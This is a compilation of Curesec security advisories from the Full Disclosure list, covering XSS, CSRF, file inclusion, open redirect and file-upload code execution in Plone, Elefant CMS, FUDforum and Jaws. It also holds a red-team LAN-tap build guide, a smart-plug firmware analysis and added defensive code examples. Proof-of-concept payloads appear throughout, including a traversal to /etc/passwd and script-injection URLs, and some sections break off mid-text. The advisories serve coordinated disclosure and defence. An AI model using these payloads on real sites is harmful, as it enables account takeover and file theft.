    http://0.0.0.0:9090//Plone/manage_findResult?obj_metatypes%3Alist=all&obj_ids%3Atokens=%22+autofocus+onfocus%3dalert(1)%3E&obj_searchterm=&obj_mspec=%3C&obj_mtime=&search_sub%3Aint=1&btn_submit=Find

4. Solution

To mitigate this issue please apply the hotfix 20170117.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVE
09/06/2016 CVE assigned
09/06/2016 Vendor requests 90 days to release fix
01/10/2017 Contacted Vendor again, Vendor announces hotfix
01/17/2017 Vendor releases hotfix
01/26/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Plone-XSS-186.html
[FD] Elefant CMS 1.3.12-RC: CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Elefant CMS 1.3.12-RC
Fixed in:            1.3.13
Fixed Version Link:  https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:      https://www.elefantcms.com/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 02/02/2017
Release mode:        Coordinated Release
CVE:                 n/a (not requested)
Credits:             Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC,
it is vulnerable to cross site request forgery. If a victim visits a website
that contains specifically crafted code while logged into Elefant, an
attacker can for example create a new admin account without the victim's
knowledge.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

There is no CSRF protection for various components, allowing, among other
things, the creation of new admin accounts or XSS attacks.

Proof of Concept:

Create New Admin:

    http://localhost/user/add"; method="POST">

XSS:

    http://localhost/designer/preview"; method="POST">

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent release fixes issues, Vendor confirmed
02/02/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html
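The pfSense easyrule.php issue earlier on this page (a state change triggered by a plain GET) and the Elefant /user/add and /designer/preview issues above share the missing control: no request-bound token. The following is an added example, not pfSense's or Elefant's code, of a minimal CSRF guard for such endpoints. The session is passed in as an array so it runs from the command line; the function and field names are my own.

```php
<?php
// Added example, not pfSense's or Elefant's code: a minimal CSRF guard for
// state-changing PHP endpoints like the advisories' easyrule.php and
// /user/add. State changes are refused over GET, and a POST must carry a
// per-session token that is compared in constant time. The session is an
// array parameter so the example runs stand-alone; names are my own.

/** Return the session's CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Decide whether a state-changing request may proceed.
 * - Only POST is accepted, so a link or <img> pointing at the action URL
 *   (the easyrule.php pattern) does nothing.
 * - The submitted token must equal the session token; hash_equals() keeps
 *   the comparison time independent of how many leading bytes match.
 */
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Constructed requests against one session.
$session = [];
$token = csrf_token($session);
echo csrf_field($session), "\n\n";

$cases = [
    'GET to the action URL (advisory pattern)' => ['GET',  ['action' => 'pass']],
    'cross-site POST without token'            => ['POST', ['action' => 'pass']],
    'cross-site POST with wrong token'         => ['POST', ['action' => 'pass', 'csrf_token' => str_repeat('0', 64)]],
    'POST from the application\'s own form'    => ['POST', ['action' => 'pass', 'csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    $allowed = csrf_request_allowed($method, $post, $session);
    printf("%-44s %s\n", $label, $allowed ? 'allowed' : 'refused');
}
```

As defence in depth, issuing the session cookie with the SameSite attribute stops browsers from attaching it to cross-site requests in the first place.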
[FD] Elefant CMS 1.3.12-RC: Multiple Persistent and Reflected XSS
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Elefant CMS 1.3.12-RC
Fixed in: 1.3.13
Fixed Version Link: https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website: https://www.elefantcms.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 02/02/2017
Release mode: Coordinated Release
CVE: n/a (not requested)
Credits: Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC, it is vulnerable to multiple persistent XSS issues as well as a reflected XSS issue. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

Persistent XSS: Username

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

The username is echoed in various locations in the administration backend without encoding, leading to persistent XSS vulnerabilities. A user account is required, but registration is open by default.

Proof of Concept:
1. Register a new user (the registration is open by default).
2. Update the profile, as name use: Username

To trigger the payload:
1. Log in as admin
2. View the edit page for the user, for example: http://localhost/user/edit?id=3

Alternatively, the payload is also echoed on the page listing all users:
http://localhost/admin/versions?id=&type=User

As well as on the version page:
http://localhost/admin/versions?type=User&id=3

Persistent XSS: Version Comparison

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Various fields of various components are echoed unencoded when comparing versions of those components. Examples are the user profile fields Name, Address, Address 2, City, Title, Company, or About, or the Title, Menu Title, Window Title, Description, or Keyword of a page.

Proof of Concept:
The comparison page can for example be seen here:
http://localhost/admin/compare?id=8&current=no

Persistent XSS: Page & Content Block

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title of a new web page is echoed unencoded, leading to persistent XSS. The same issue also exists when creating blocks. A user account with the right to create pages is required. By default, the editor role has this right.

Proof of Concept:
Create a new page or block, as title use:

The payload will be echoed in a title tag as well as an h1 tag when viewing the page and when editing the page.

Persistent XSS: Blog Post

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

The title as well as the tags of a blog post are echoed unencoded, leading to persistent XSS. A user account with the right to create pages is required. By default, the editor role has this right.

Proof of Concept:
Create a new blog post, as title and tag use: '">

The payload will be echoed in a title tag, an h1 tag, as well as an href attribute when viewing the page and when editing the page.

Reflected XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

The name parameter of the custom fields component is vulnerable to reflected XSS.

Proof of Concept:
GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E HTTP/1.1

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent releases fix issues, Vendor confirmed
02/02/2017 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html
[FD] Tap 'n' Sniff
Content Table

1. Introduction
2. Failsafe mode
3. Installing OpenWrt
4. Configuring OpenWrt
5. Testing

1. Introduction

The goal of this guide is to provide a reliable and fast way of creating a LAN tap for red team assessments of networks. While this was our main target, the tap is also quite helpful if you want a great device for your daily analysis of network-attached computers.

Before we started with our implementation we made a list of things that were mandatory. The hardware had to be small, have at least two LAN ports and WiFi, be cheap, and have open source firmware included or available. After some research we chose the TL-WR810N, a 20 euro pocket router which should be available in most electronics stores. It features two LAN ports and a WiFi card, which allows us to bridge the LAN interfaces and create a hidden AP to connect to the device. It should be said that the device only supports Fast Ethernet (100 Mbit/s) and not Gigabit Ethernet (1000 Mbit/s), but at this size you can't be picky, and it is quite difficult to find something better even online when ordering from a foreign country.

After we are finished we want to be able to listen to the network traffic between the tapped sources, manipulate packets, or directly pivot into the network. For our setup we are going to use OpenWrt instead of the default TP-Link firmware. We are currently working on creating an image that will make the configuration of OpenWrt obsolete, so stay tuned for info regarding this.

And this is how it actually looks:
[wr810n_front] [wr810n_back] [wr810n_ports] [wr810n_led_switch]

On the inside we find a SoC (System on Chip), namely the Qualcomm Atheros QCA9533, which is capable of wireless A/B/G/N communication and has a clock speed of 560 MHz according to wikidevi. There is also 64 MB of RAM, and we can use 4.6 MB of flash storage, with 1.1 MB still available after finishing this guide. Below is the output of cpuinfo, free and df. It is interesting that when we opened the device later on we actually found the CPU to be a different one, the Qualcomm QCA9531-BL3A, but apparently they are identical.

Basic information found via command line:

    root@OpenWrt:~# cat /proc/cpuinfo
    system type             : Qualcomm Atheros QCA9533 ver 2 rev 0
    machine                 : TP-LINK TL-WR810N
    processor               : 0
    cpu model               : MIPS 24Kc V7.4
    BogoMIPS                : 432.53
    wait instruction        : yes
    microsecond timers      : yes
    tlb_entries             : 16
    extra interrupt vector  : yes
    hardware watchpoint     : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
    isa                     : mips1 mips2 mips32r1 mips32r2
    ASEs implemented        : mips16
    shadow register sets    : 1
    kscratch registers      : 0
    package                 : 0
    core                    : 0
    VCED exceptions         : not available
    VCEI exceptions         : not available

    root@OpenWrt:~# free
                 total       used       free     shared    buffers     cached
    Mem:         60220      17032      43188         20       1504       4828
    -/+ buffers/cache:      10700      49520
    Swap:            0          0          0

    root@OpenWrt:~# df -h -T
    Filesystem           Type       Size      Used Available Use% Mounted on
    /dev/root            squashfs   2.0M      2.0M         0 100% /rom
    tmpfs                tmpfs     29.4M     20.0K     29.4M   0% /tmp
    /dev/mtdblock3       jffs2      4.6M      3.5M      1.1M  76% /overlay
    overlayfs:/overlay   overlay    4.6M      3.5M      1.1M  76% /
    tmpfs                tmpfs    512.0K         0    512.0K   0% /dev

2. Failsafe mode

Before we begin you should know about the built-in failsafe mode of OpenWrt. It exists just in case you make a mistake and lose the connection to the router by something other than a reboot. It is activated by pressing the reset button rapidly on startup until the LED blinks more frequently than usual. Now you have to give your Ethernet interface an IP like 192.168.1.2 and connect to the WAN/LAN port. Then you should be able to SSH to 192.168.1.1 as root without a password. In the SSH session you can mount the filesystem with mount_root and reverse the changes that made your system fail. If the worst-case scenario happens and you have no clue why your system behaves abnormally, you can always reinstall OpenWrt. To do so, we copy our image via scp into the tmp directory of the router:

    scp /path/to/image/ root@192.168.1.1:/tmp

Now we use the sysupgrade command on the router to install the bin file:

    sysupgrade -n /tmp/binary

The -n flag means that we also erase all config files. Don't worry if you lose the connection: first the router will reboot, and then you have to switch your LAN cable to the LAN port again.

3. Installing OpenWrt

Installing OpenWrt is as easy as it gets: you just have to configure the router, preferably by connecting via LAN, using its web interface, and download the respective firmware image from the OpenWrt wiki. We used the EU version 1.1, also available at our github (TODO), since we can't guarantee this procedure to work with other versions that might be published in the future. The easiest way to install OpenWrt is via the web interface and its option Firmware-Upgrade. If, for whatever reason, this fails, you can also install OpenWrt via the serial console or TFTP. A guide can be found at the wiki. After doing so, you will lose the connection to the ro
[FD] The HS-110 Smart Plug aka Projekt Kasa
Content Table

1. Introduction
2. The Firmware
3. The Android Application
4. The Problems
5. Conclusion
6. Appendix
6.1. Excursion Dalvik
6.2. Control script

1. Introduction

The HS-110 is a Smart Plug, meaning it is capable of being controlled with commands via a network. TP-Link released a mobile application called "Kasa for Mobile" for Android and iOS devices to control the Smart Plug. The possibilities range from simple tasks like turning the plug on and off to advanced options like planning schedules and timers. The HS-110 additionally has the possibility to measure and store data regarding power consumption. These are screenshots of the app home screen, the main control and the settings for a plug:
[app control screen] [plug control screen] [plug settings]

The device itself is pretty straightforward with only two buttons. The one at the top is the reset button and the other one in the front is the power button and status LED:
[plug from the front] [plug from the top] [plug from the back]

To open it we remove the hidden screw under the information sheet and then break it open using a little bit of force:
[open1] [open2]

Now we remove the top part of the board and the two screws on the second part to get rid of the plastic hull:
[open3] [open4] [open5]

We can now see the Atheros AR9331 (Hornet) on the right board in the middle picture above. It is a System-on-a-Chip (SoC) which has a MIPS 24K processor and is a full-featured IEEE 802.11n 1x1 AP/Router. It also has 32 MiB of RAM (Zentel A3S56D40GTP-50l) on the opposite side of the same board. The other board hosts the electronics for the actual plug. But the interesting question is: what is this SoC actually running? So let's move on to the next section.

2. The Firmware

The Smart Plug runs on a 64-bit Linux (2.6.31). The firmware is available at the website of TP-Link. Our version is 1.0.7. There is also an unofficial unstable API on GitHub. For a first analysis of the firmware we used binwalk. It is important to also install sasquatch for this, since unsquashfs appears to have issues with TP-Link firmware. You can install the tools needed to build sasquatch via apt:

    sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev

or the corresponding packages if you don't use apt. After that just clone the sasquatch git repository and run the build script. At the end we have to install binwalk by cloning its git repository and running the setup.py script via

    sudo python setup.py install

or

    sudo python3 setup.py install

if you are using Python 3.x. For the dependencies we can run deps.sh, at least when we are using apt. Otherwise you have to install them yourself. A list is available at GitHub. Now we are ready to run binwalk on the firmware with the following command:

    root@kali:~/Desktop/test# binwalk hs110v1_us_1.0.7_Build_151016_Rel.24186.bin

    DECIMAL       HEXADECIMAL     DESCRIPTION
    15904         0x3E20          U-Boot version string, "U-Boot 1.1.4 (Oct 16 2015 - 11:22:22)"
    15952         0x3E50          CRC32 polynomial table, big endian
    17244         0x435C          uImage header, header size: 64 bytes, header CRC: 0xA2B5F4E6, created: 2015-10-16 03:22:22, image size: 38777 bytes, Data Address: 0x8001, Entry Point: 0x8001, data CRC: 0xFED80D4A, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image"
    17308         0x439C          LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 112564 bytes
    66240         0x102C0         uImage header, header size: 64 bytes, header CRC: 0x4D2B83AC, created: 2015-10-16 03:22:56, image size: 772570 bytes, Data Address: 0x80002000, Entry Point: 0x8019BF90, data CRC: 0xC849B1ED, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image"
    66304         0x10300         LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2238780 bytes
    1114816       0x1102C0        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2112689 bytes, 194 inodes, blocksize: 16384 bytes, created: 2015-10-16 03:25:36

This is the most basic command of binwalk and only tells it to analyze the specified file. As we can see, binwalk detects quite a few things. First of all there is the U-Boot version string and image header, together with its LZMA archive and the CRC32 polynomial table. U-Boot is a common bootloader; as we can see it was created on October 16th 2015 at 11 o'clock, but it is out of our scope to go through it. The next thing we notice is the kernel header and archive, which is a little bit more interesting, but we are still looking for the actual system, which is the last entry: the Squashfs filesystem, compressed with LZMA. Now we could extract the Squashfs filesystem via dd, but we can also modify our command with the argument -e to let binwalk do this. The -e argument tells binwalk to extract the firmware using predefined dd rules. The output should look like
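To see what binwalk is reporting above, here is an added Python example (not from the original post and not binwalk's code) that locates uImage headers and Squashfs superblocks in a blob and decodes the fields binwalk prints, verifying the uImage header and data CRCs on the way. The 64-byte uImage layout and the Squashfs 4.0 superblock layout are the standard ones; the blob it scans is constructed inline and is not the HS-110 image.

```python
import struct
import zlib
from datetime import datetime, timezone

# Standard 64-byte U-Boot "uImage" header, all fields big-endian: magic,
# header CRC, build time, data size, load address, entry point, data CRC,
# OS, architecture, image type, compression, 32-byte image name.
UIMAGE_MAGIC = 0x27051956
UIMAGE_FMT = ">IIIIIIIBBBB32s"
UIMAGE_SIZE = struct.calcsize(UIMAGE_FMT)  # 64
IMAGE_TYPES = {2: "OS Kernel Image", 5: "Firmware Image"}
COMPRESSION = {0: "none", 1: "gzip", 2: "bzip2", 3: "lzma"}
OSES, ARCHS = {5: "Linux"}, {5: "MIPS"}

# Squashfs 4.0 superblock, little-endian ("hsqs") as in the HS-110 image:
# magic, inodes, mkfs time, block size, fragments, compressor, block log,
# flags, id count, major, minor, root inode, bytes used.
SQUASHFS_MAGIC = b"hsqs"
SQUASHFS_FMT = "<IIIIIHHHHHHQQ"
SQUASHFS_COMP = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}


def fmt_time(ts):
    return datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def parse_uimage(blob, offset):
    """Decode the uImage header at `offset` and verify both CRCs."""
    hdr = blob[offset:offset + UIMAGE_SIZE]
    if len(hdr) < UIMAGE_SIZE:
        return None
    (magic, hcrc, ts, size, load, entry, dcrc,
     os_id, arch, typ, comp, name) = struct.unpack(UIMAGE_FMT, hdr)
    if magic != UIMAGE_MAGIC:
        return None
    zeroed = hdr[:4] + b"\x00" * 4 + hdr[8:]   # header CRC is taken with its own field zeroed
    data = blob[offset + UIMAGE_SIZE:offset + UIMAGE_SIZE + size]
    return {
        "offset": offset, "type": IMAGE_TYPES.get(typ, typ),
        "header_crc_ok": zlib.crc32(zeroed) == hcrc,
        "data_crc_ok": len(data) == size and zlib.crc32(data) == dcrc,
        "created": fmt_time(ts), "image_size": size,
        "load_addr": load, "entry_point": entry,
        "os": OSES.get(os_id, os_id), "cpu": ARCHS.get(arch, arch),
        "compression": COMPRESSION.get(comp, comp),
        "name": name.split(b"\x00", 1)[0].decode("ascii", "replace"),
    }


def parse_squashfs(blob, offset):
    """Decode the Squashfs superblock at `offset` (the fields binwalk prints)."""
    size = struct.calcsize(SQUASHFS_FMT)
    sb = blob[offset:offset + size]
    if len(sb) < size:
        return None
    (_, inodes, mkfs, block_size, _, comp, _, _, _,
     major, minor, _, bytes_used) = struct.unpack(SQUASHFS_FMT, sb)
    return {"offset": offset, "type": "Squashfs filesystem", "endian": "little",
            "version": f"{major}.{minor}", "compression": SQUASHFS_COMP.get(comp, comp),
            "size": bytes_used, "inodes": inodes, "blocksize": block_size,
            "created": fmt_time(mkfs)}


def scan(blob):
    """Signature scan in the spirit of binwalk: every uImage header whose header
    CRC checks out, plus every Squashfs superblock, sorted by offset."""
    found = []
    for magic, parser in ((struct.pack(">I", UIMAGE_MAGIC), parse_uimage),
                          (SQUASHFS_MAGIC, parse_squashfs)):
        pos = blob.find(magic)
        while pos != -1:
            info = parser(blob, pos)
            if info and info.get("header_crc_ok", True):
                found.append(info)
            pos = blob.find(magic, pos + 1)
    return sorted(found, key=lambda f: f["offset"])


def build_uimage(name, payload, typ, comp, load, entry, ts):
    """Construct a valid uImage (header + payload) for the demo blob."""
    hdr = struct.pack(UIMAGE_FMT, UIMAGE_MAGIC, 0, ts, len(payload), load, entry,
                      zlib.crc32(payload), 5, 5, typ, comp, name.encode())
    return hdr[:4] + struct.pack(">I", zlib.crc32(hdr)) + hdr[8:] + payload


# Constructed sample blob (not the HS-110 image): padding, a kernel uImage with the
# addresses binwalk reported, filler, then a Squashfs 4.0 superblock stub.
KERNEL_PAYLOAD = b"\x5d\x00\x00\x00\x02" + b"fake-lzma-kernel" * 8   # 133 bytes
SAMPLE = (b"\x00" * 48
          + build_uimage("Linux Kernel Image", KERNEL_PAYLOAD, typ=2, comp=3,
                         load=0x80002000, entry=0x8019BF90, ts=1444965776)
          + b"\xff" * 16
          + struct.pack(SQUASHFS_FMT, 0x73717368, 194, 1444965936, 16384, 0,
                        2, 14, 0, 1, 4, 0, 0, 2112689)
          + b"\x00" * 16)

if __name__ == "__main__":
    for entry in scan(SAMPLE):
        print(entry["offset"], hex(entry["offset"]), entry)
```

Flipping one byte of the kernel payload leaves the header CRC intact but fails the data CRC, which is the check to run before trusting a dumped image.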
[FD] FUDforum 3.0.6: LFI
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: LFI
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description:
The "file" parameter of the hlplist.php script is vulnerable to directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:
http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
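An added example, not FUDforum's code, of the containment check the hlplist.php file parameter is missing: the inputs are modelled on the advisory's tlang and file values, the help directory is a temporary tree the demo builds itself, and the function names are assumptions.

```python
import os
import tempfile

# The advisory's "file" value, which walks up to the filesystem root.
TRAVERSAL = "../../../../../../../../../../etc/passwd"


class PathTraversal(ValueError):
    pass


def resolve_unchecked(base_dir, tlang, file_param):
    """The pattern behind the advisory (modelled, not FUDforum's code):
    user input is joined onto the help directory with no containment check."""
    return os.path.normpath(os.path.join(base_dir, tlang, file_param))


def resolve_help_file(base_dir, tlang, file_param):
    """Join base/<tlang>/<file>, canonicalise it (symlinks included) and refuse
    anything that does not stay inside base_dir."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, tlang, file_param))
    # commonpath rather than startswith: /srv/help must not accept /srv/helpers/x
    if os.path.commonpath([base, candidate]) != base:
        raise PathTraversal(f"{file_param!r} resolves outside {base_dir}")
    return candidate


def demo():
    """Builds a throwaway help tree and exercises the checked resolver."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "help")
        os.makedirs(os.path.join(base, "af"))
        os.makedirs(os.path.join(root, "helpers"))   # sibling with a shared prefix
        with open(os.path.join(base, "af", "index.html"), "w") as fh:
            fh.write("<p>help</p>\n")
        legit = resolve_help_file(base, "./af", "index.html")
        results["legit_resolves"] = os.path.isfile(legit)
        for label, tlang, fname in (("traversal", "./af", TRAVERSAL),
                                    ("prefix_trap", "../helpers", "x.html")):
            try:
                resolve_help_file(base, tlang, fname)
                results[label + "_blocked"] = False
            except PathTraversal:
                results[label + "_blocked"] = True
    return results


if __name__ == "__main__":
    print(resolve_unchecked("/var/www/fudforum/adm/help", "./af", TRAVERSAL))
    print(demo())
```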
[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Jaws 1.1.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://jaws-project.com/
Vulnerability Type: Object Injection, Open Redirect, Cookie Flags
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is vulnerable to various low to medium impact issues. It contains an Object Injection, which does not seem to be currently exploitable without custom changes made by users; its session cookies are not set to httpOnly, which may make it easier to exploit XSS issues; and it contains an Open Redirect issue.

3. Details

Open Redirect / Phishing

After a login is performed, a user is redirected to a website defined in the URL, which may be exploited in phishing attacks. Note that the redirect only works if the user was not logged in previously, and then only after a login is performed.

Proof of Concept:
http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/687474703a2f2f6578616d706c652e636f6d.html

687474703a2f2f6578616d706c652e636f6d is the hex-encoded target, which the application decodes with a hex2bin call.

Object Injection

All parameters passed to the application are passed to unserialize, making the application vulnerable to Object Injection. Currently, there does not seem to be code that can be exploited via Object Injection, but this may change in the future, or users may have custom code which isn't in itself vulnerable, but would result in vulnerable code in combination with this issue.

Proof of Concept:
All values passed to the application are vulnerable, for example a cookie:

GET /jaws-complete-1.1.1/admin.php?checksess HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JAWSSESSID=O:{};
Connection: close
Cache-Control: max-age=0

Cookie Flags

The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly easier to exploit XSS vulnerabilities.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html
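An added example (not Jaws' code) of validating the post-login referrer: it decodes the hex-encoded value the way the advisory describes and then only honours local paths, so the PoC value above falls back to the landing page. Function names and the landing page are assumptions.

```python
import binascii
from urllib.parse import urlsplit, urlunsplit

DEFAULT_LANDING = "/"   # assumed fallback page


def decode_referrer(hex_referrer):
    """Jaws carries the post-login target hex-encoded in the URL (it calls
    hex2bin on it); decode the same way. Anything that is not valid hex -> None."""
    try:
        return binascii.unhexlify(hex_referrer).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def safe_redirect_target(raw, fallback=DEFAULT_LANDING):
    """Accept only a local absolute path (optionally with query/fragment);
    anything that could leave the site falls back to the landing page."""
    if not raw:
        return fallback
    raw = raw.strip()
    # Backslashes and control characters let browsers reinterpret the URL.
    if "\\" in raw or any(ord(c) < 0x20 for c in raw):
        return fallback
    # "//evil.example" and "///evil.example" are scheme-relative, not local paths.
    if raw.startswith("//"):
        return fallback
    parts = urlsplit(raw)
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        return fallback      # http://..., javascript:..., relative paths
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


def login_redirect(hex_referrer):
    """Where the login handler should send the user for a given referrer parameter."""
    return safe_redirect_target(decode_referrer(hex_referrer))


if __name__ == "__main__":
    for value in ("687474703a2f2f6578616d706c652e636f6d", "2f75736572732f70726f66696c65", "zz"):
        print(value, "->", decode_referrer(value), "->", login_redirect(value))
```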
[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: FUDforum 3.0.6
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://fudforum.org/forum/
Vulnerability Type: XSS, Login CSRF
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to multiple persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:
The filename of attached images in private messages is vulnerable to persistent XSS.

Proof of Concept:
Send a PM to a user. Add an attachment, where the filename is: '">.jpg
When the recipient views the PM, the injected code will be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:
The filename of attached images in forum posts is vulnerable to persistent XSS.

Proof of Concept:
Create a new forum post. Add an attachment, where the filename is: '">.jpg
When viewing the post the injected code will be executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description:
When editing a profile, the signature is echoed unencoded, leading to persistent XSS.

Proof of Concept:
Visit http://localhost/fudforum/index.php?t=register and as signature use: '">

The injected code is either executed when the user themselves edits their profile - which may be exploited via login CSRF - or when an admin visits the edit profile page located here:
http://localhost/fudforum/index.php?t=register&mod_id=6&&SQ=1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description:
The login of FUDforum does not have any CSRF protection. The impact of this is low, but an attacker might get a victim to disclose sensitive information by using CSRF to log the victim into an attacker-controlled account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the user area.

Proof of Concept:
http://localhost/fudforum/index.php?t=login"; method ="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
[FD] Jaws 1.1.1: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Jaws 1.1.1
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://jaws-project.com/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is vulnerable to code execution as it allows the upload of files with a dangerous type. An account with extended privileges is required.

3. Details

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file manager forbids the uploading of most PHP and htaccess files by checking the extension of uploaded files and renaming files when required. However, the check can be bypassed by an attacker as the file extension .pht - which is treated as a PHP file by default Apache installations - is not filtered. An account with access to the file manager is required.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public

Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html
[FD] Lepton 2.2.2: Code Execution
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
